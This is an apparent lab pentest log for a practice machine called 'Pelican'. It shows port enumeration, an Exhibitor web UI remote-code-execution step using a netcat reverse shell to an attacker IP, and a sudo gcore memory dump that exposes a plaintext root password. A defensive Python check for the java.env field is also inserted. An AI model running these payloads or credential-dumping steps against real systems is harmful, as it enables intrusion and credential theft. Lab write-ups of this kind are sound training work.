Pelican
Pentest Log: 2025-08-11
Target Information
- Machine Name: Pelican
- IP Address: 192.168.187.98
- Operating System: Linux
ip=192.168.187.98
Enumeration
Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 139, 445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 631
Port 2181
Port 8080
http://192.168.187.98:8080/exhibitor/v1/ui/index.html
Googled "ZooKeeper v1.0 exploit" and found:
https://www.exploit-db.com/exploits/48654
Port 8081
|_http-title: Did not follow redirect to http://192.168.187.98:8080/exhibitor/v1/ui/index.html
Port 44267
Exploitation
Vulnerability Summary
- Service / Port: 8080
- Vulnerability Type: RCE
Exploit Execution
Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/48654
Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
In the "java.env script" field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:
$(/bin/nc -e /bin/sh 192.168.45.163 8080 &)
Click Commit > All At Once > OK
The command may take up to a minute to execute.
python3 /home/kali/Documents/oscp/penelope/penelope.py -p 8080
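A defender-side check for the java.env abuse described in the steps above, as an added example that is not part of the original log or of Exhibitor's own code: it treats the field as an allowlist of literal variable assignments and reports every other line. The `javaEnvironment` key name and both sample configs are assumptions constructed for illustration.

```python
import json
import re

# Assumption: the config JSON stores the "java.env script" text under this key.
FIELD = "javaEnvironment"

# A benign java.env line is one variable assignment with a literal value.
ASSIGNMENT = re.compile(r'^(?:export\s+)?[A-Za-z_][A-Za-z0-9_]*=(.*)$')
SAFE_BARE = re.compile(r'^[A-Za-z0-9_./:=+,@%-]*$')
VAR_REF = re.compile(r'\$(?:[A-Za-z_][A-Za-z0-9_]*|\{[A-Za-z_][A-Za-z0-9_]*\})')


def literal_value(value):
    """True for a bare word or one quoted string that cannot run a command."""
    if len(value) >= 2 and value[0] == value[-1] == "'":
        return "'" not in value[1:-1]
    if len(value) >= 2 and value[0] == value[-1] == '"':
        # Plain $VAR / ${VAR} references are fine; any other $ or ` is not.
        inner = VAR_REF.sub("", value[1:-1])
        return not any(ch in inner for ch in '"`$\\')
    return bool(SAFE_BARE.match(value))


def audit_java_env(script):
    """Return (line_number, text) for each line that is not a literal assignment."""
    findings = []
    for number, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = ASSIGNMENT.match(line)
        if not match or not literal_value(match.group(1)):
            findings.append((number, line))
    return findings


def audit_config(config_json):
    """Audit the java.env field of an exported config document."""
    return audit_java_env(json.loads(config_json).get(FIELD, ""))


# Constructed samples: normal JVM tuning, and the $() pattern with a harmless command.
BENIGN = json.dumps({FIELD: 'export JAVA_OPTS="-Xmx512m $JAVA_OPTS"\n# logs\nZOO_LOG_DIR=/var/log/zk'})
TAMPERED = json.dumps({FIELD: 'export JAVA_OPTS="-Xmx512m"\n$(/usr/bin/id &)'})

if __name__ == "__main__":
    for name, cfg in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(name, audit_config(cfg))
```

Because the script is sourced by a shell, the check rejects anything that is not a plain assignment rather than only looking for `$()` and backticks.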
Privilege Escalation
Current Access
- User: charles
- Groups: charles
- Shell Type: reverse shell
Enumeration
Sudo:
sudo -l
found root running
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
Privilege Escalation Exploit
Exploit Summary
- Technique Used: Sudo Abuse
- Target Binary/Service: Gcore
- Reference / Source: GTFOBins
Exploit Steps
- Enumerate
ps -aux
sudo gcore 486
strings core.486
found
root:ClogKingpinInning731
- Smash to root
su -